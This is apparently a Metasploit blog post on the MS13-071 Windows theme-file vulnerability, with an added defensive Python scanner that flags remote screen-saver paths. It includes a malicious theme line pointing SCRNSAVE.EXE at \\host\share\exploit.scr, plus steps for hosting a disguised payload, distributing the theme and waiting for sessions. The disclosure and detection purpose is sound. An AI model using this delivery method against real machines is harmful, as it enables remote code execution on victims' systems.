Recently we've added an exploit for MS13-071 to Metasploit. Rated "Important" by Microsoft, this remote code execution vulnerability, found by Eduardo Prado, affects Windows XP and Windows 2003 environments and is triggered by the handling of specially crafted themes. In this blog post we would like to discuss the vulnerability and give some helpful tips for exploiting it from Metasploit.
First of all, the bug occurs while handling the [boot] section of .theme files, where an arbitrary path can be used as the screen saver.
Since SCR files are just Windows executables, the vulnerability can be exploited by placing a malicious EXE on a shared folder and distributing a malicious .theme that references the remote screen saver, for example "SCRNSAVE.EXE=\\host\share\exploit.scr". When the victim opens the .theme and visits the Screen Saver tab, the payload is executed.
Code execution is also triggered if the victim installs the malicious theme and then stays away from the computer long enough for Windows to try to display the screen saver.
To fix it, the Microsoft patch adds a new function, EnsureInfoxScreenSaver(), which tries to verify the screen saver path before it is used.
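To make the file-format side of this concrete from the defender's seat, here is a small scanner (an added example, not code from this post or from Metasploit) that parses a .theme file and classifies its [boot] SCRNSAVE.EXE entry the way a path check in the spirit of EnsureInfoxScreenSaver() would: a UNC path is flagged as high risk, and anything that does not resolve to a .scr under the system directory is flagged as medium. The INI parser, the SYSTEM_ROOT value, the "trusted directory" rule and both sample theme files are assumptions constructed for this example; the exact checks the real patch performs are not documented here.

```python
"""Scan .theme files for the MS13-071 pattern: a [boot] SCRNSAVE.EXE entry
that points to a UNC share (or anywhere outside the Windows system
directory) instead of a local, trusted screen saver.

Example code added to this post; not Microsoft's or Metasploit's logic."""
import ntpath
import re

# Assumption for offline use: where the OS lives and where trusted .scr files are.
SYSTEM_ROOT = r"C:\Windows"
TRUSTED_DIRS = (ntpath.join(SYSTEM_ROOT, "System32"),)

_SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
_KEY_RE = re.compile(r"^\s*(?P<key>[^=;]+?)\s*=\s*(?P<value>.*?)\s*$")


def parse_theme(text):
    """Minimal, tolerant INI parser: {section_lower: {key_lower: value}}.
    Blank lines and ';' comments are skipped; keys outside a section are ignored."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = _SECTION_RE.match(line)
        if m:
            current = m.group("name").strip().lower()
            sections.setdefault(current, {})
            continue
        m = _KEY_RE.match(line)
        if m and current is not None:
            sections[current][m.group("key").lower()] = m.group("value").strip('"')
    return sections


def expand_env(path):
    """Expand the two variables .theme files commonly use to the assumed SYSTEM_ROOT."""
    return re.sub(r"%(systemroot|windir)%", lambda _m: SYSTEM_ROOT, path, flags=re.I)


def classify_screensaver(value):
    """Return (severity, reason) for a SCRNSAVE.EXE value.
    normpath collapses '..' so traversal out of System32 is caught too."""
    if not value:
        return ("info", "screen saver disabled")
    path = ntpath.normpath(expand_env(value))
    drive, _rest = ntpath.splitdrive(path)
    if drive.startswith("\\\\"):
        return ("high", "UNC path: screen saver would be fetched from a remote share")
    if not drive:
        return ("medium", "no drive letter: path is resolved at runtime, not a fixed system location")
    if not path.lower().endswith(".scr"):
        return ("medium", "unexpected extension for a screen saver")
    if not any(path.lower().startswith(d.lower() + "\\") for d in TRUSTED_DIRS):
        return ("medium", "screen saver outside the Windows system directory")
    return ("ok", "local screen saver under the system directory")


def scan_theme(text):
    """Classify the [boot] SCRNSAVE.EXE entry of one .theme file's contents."""
    boot = parse_theme(text).get("boot", {})
    if "scrnsave.exe" not in boot:
        return ("info", "no SCRNSAVE.EXE entry in [boot]")
    return classify_screensaver(boot["scrnsave.exe"])


# Constructed samples (not real theme files). The second uses the UNC value
# quoted in the post above.
BENIGN_THEME = r"""; constructed benign sample
[Theme]
DisplayName=Sample Theme
[boot]
SCRNSAVE.EXE=%SystemRoot%\System32\example.scr
"""

MALICIOUS_THEME = r"""; constructed sample reproducing the MS13-071 pattern
[Theme]
DisplayName=Sample Theme
[boot]
SCRNSAVE.EXE=\\host\share\exploit.scr
"""

if __name__ == "__main__":
    for label, theme in (("benign", BENIGN_THEME), ("unc", MALICIOUS_THEME)):
        severity, reason = scan_theme(theme)
        print(f"{label:8s} {severity:6s} {reason}")
```

Run it on a directory of .theme files pulled from mail attachments or a file share and alert on "high"; the "medium" results are the ones a stricter policy (local .scr under System32 only) would also refuse.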
With the vulnerability analyzed, writing a file-format exploit and using it isn't hard if you keep two things in mind:
- There is a malicious .theme file which the victim must open.
- There is a payload embedded in an EXE, disguised as an SCR, which must be distributed through a shared folder.
That said, let's see how to use the current Metasploit module, which supports two modes of operation:
- Use an external shared resource (a Samba server or a Windows shared folder) to host the malicious screen saver. In this case:
1) Configure the UNCPATH option:
2) Deploy the payload, embedded in an EXE, at the UNCPATH location:
3) Finally, run a handler for the payload, distribute the malicious .theme file (generated in step 1) and wait for sessions:
- Use the SMBServer support embedded in the module. In this case, just configure the SRVHOST option to listen on an address reachable by the victims and let the embedded SMBServer mixin do the work. Distribute the .theme file and wait for sessions:
The SMBServer mixin needs root privileges to bind to port 445/TCP. It will also fail if the port is already in use (common on Windows hosts or on machines running a Samba server). Since the code overriding the SMBServer mixin is brand new, I'd love to hear from you whether it worked for you. Remember it has been tested only on Windows XP SP3 and Windows 2003 SP2, the current targets for this exploit.
Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.